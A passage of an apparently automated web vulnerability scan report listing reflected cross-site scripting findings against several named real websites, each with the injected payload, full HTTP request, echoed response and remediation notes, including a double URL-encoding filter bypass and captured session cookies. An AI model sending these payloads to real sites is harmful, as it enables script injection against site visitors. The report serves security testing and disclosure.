User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: M7F1=CT;

Response

HTTP/1.1 501 Not Implemented
Server: Apache
Last-Modified: Thu, 13 Jan 2011 21:33:44 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=604788
Date: Tue, 25 Jan 2011 14:24:57 GMT
Connection: close
Content-Length: 77

No class by name: UserMsgControllera4a28<script>alert(1)</script>00a7fd303d

4.516. http://www.barcelonaworldrace.org/en/actualite/breves [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 556c1"><script>alert(1)</script>727745fc927 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite556c1"><script>alert(1)</script>727745fc927/breves HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 14:31:39 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web13; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite556c1"><script>alert(1)</script>727745fc927/breves">
...[SNIP]...

4.517. http://www.barcelonaworldrace.org/en/actualite/breves [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2d1b"><script>alert(1)</script>dd99ef630da was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite/brevesf2d1b"><script>alert(1)</script>dd99ef630da HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 14:32:01 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web12; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/brevesf2d1b"><script>alert(1)</script>dd99ef630da">
...[SNIP]...

4.518. http://www.barcelonaworldrace.org/en/actualite/breves [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab784"><script>alert(1)</script>de6cf7e9710 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en/actualite/breves?ab784"><script>alert(1)</script>de6cf7e9710=1 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:25:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web11; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/breves/?ab784"><script>alert(1)</script>de6cf7e9710=1">
...[SNIP]...

4.519. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26a86"><script>alert(1)</script>e4c5d77f49c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite26a86"><script>alert(1)</script>e4c5d77f49c/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 14:27:23 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web12; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite26a86"><script>alert(1)</script>e4c5d77f49c/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072">
...[SNIP]...

4.520. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d466d"><script>alert(1)</script>bba68bdbca5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite/brevesd466d"><script>alert(1)</script>bba68bdbca5/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 14:28:17 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web12; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/brevesd466d"><script>alert(1)</script>bba68bdbca5/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072">
...[SNIP]...

4.521. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfb6e"><script>alert(1)</script>f1e290a806 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite/breves/detaildfb6e"><script>alert(1)</script>f1e290a806/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 14:29:47 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web12; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/breves/detaildfb6e"><script>alert(1)</script>f1e290a806/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072">
...[SNIP]...

4.522. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload c6ad4--><script>alert(1)</script>660f16bc18 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/actualite/breves/detailc6ad4--><script>alert(1)</script>660f16bc18/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 14:30:00 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web11; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<!-- /en/actualite/breves/ VS /en/actualite/breves/detailc6ad4--><script>alert(1)</script>660f16bc18/ =>
...[SNIP]...

4.523. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a93dd"><script>alert(1)</script>30c4832b29e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072a93dd"><script>alert(1)</script>30c4832b29e HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 14:30:43 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web10; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072a93dd"><script>alert(1)</script>30c4832b29e">
...[SNIP]...

4.524. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f6fa"><script>alert(1)</script>9a2d7a57ebb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072?9f6fa"><script>alert(1)</script>9a2d7a57ebb=1 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:24:56 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web11; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072?9f6fa"><script>alert(1)</script>9a2d7a57ebb=1">
...[SNIP]...

4.525. http://www.barelyfitz.com/projects/tabber/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barelyfitz.com
Path:   /projects/tabber/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9944f"><script>alert(1)</script>7b6d4f5683e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9944f\"><script>alert(1)</script>7b6d4f5683e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /projects/tabber/?9944f"><script>alert(1)</script>7b6d4f5683e=1 HTTP/1.1
Host: www.barelyfitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:24:45 GMT
Server: Apache
X-Powered-By: PHP/4.4.1
Connection: close
Content-Type: text/html
Content-Length: 14864

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML LANG="en">
<HEAD>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859
...[SNIP]...
<a href="/projects/tabber/index.php?printable_version=1&9944f\"><script>alert(1)</script>7b6d4f5683e=1" title="Print this page">
...[SNIP]...

4.526. http://www.beirut.com/Hotels/2-Stars/2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Hotels/2-Stars/2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21cfa'-alert(1)-'b99422c7d12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Hotels21cfa'-alert(1)-'b99422c7d12/2-Stars/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:36:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Hotels21cfa'-alert(1)-'b99422c7d12/2-Stars';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.527. http://www.beirut.com/Hotels/2-Stars/2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Hotels/2-Stars/2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 884f8"><a>37626885d13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Hotels884f8"><a>37626885d13/2-Stars/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:28:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Hotels884f8"><a>37626885d13">
...[SNIP]...

4.528. http://www.beirut.com/Hotels/2-Stars/2 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Hotels/2-Stars/2

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b10e'-alert(1)-'147c9ee25a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Hotels/2-Stars6b10e'-alert(1)-'147c9ee25a1/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:40:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Hotels/2-Stars6b10e'-alert(1)-'147c9ee25a1';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.529. http://www.beirut.com/Hotels/2-Stars/2 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Hotels/2-Stars/2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cdd7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e214f7752b93 was submitted in the REST URL parameter 3. This input was echoed as 9cdd7"><script>alert(1)</script>214f7752b93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Hotels/2-Stars/29cdd7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e214f7752b93 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:44:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=blue&indexpage=Hotels&listingtype=locales.php&Types=29cdd7"><script>alert(1)</script>214f7752b93">
...[SNIP]...

4.530. http://www.beirut.com/Hotels/3-Stars/3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Hotels/3-Stars/3

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e6f9'-alert(1)-'4c62994d9f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Hotels9e6f9'-alert(1)-'4c62994d9f5/3-Stars/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:35:43 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Hotels9e6f9'-alert(1)-'4c62994d9f5/3-Stars';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.531. http://www.beirut.com/Hotels/3-Stars/3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Hotels/3-Stars/3

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98463"><a>f5026478805 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Hotels98463"><a>f5026478805/3-Stars/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:27:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Hotels98463"><a>f5026478805">
...[SNIP]...

4.532. http://www.beirut.com/Hotels/3-Stars/3 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Hotels/3-Stars/3

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af8c8'-alert(1)-'c8e69a03a5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Hotels/3-Starsaf8c8'-alert(1)-'c8e69a03a5e/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
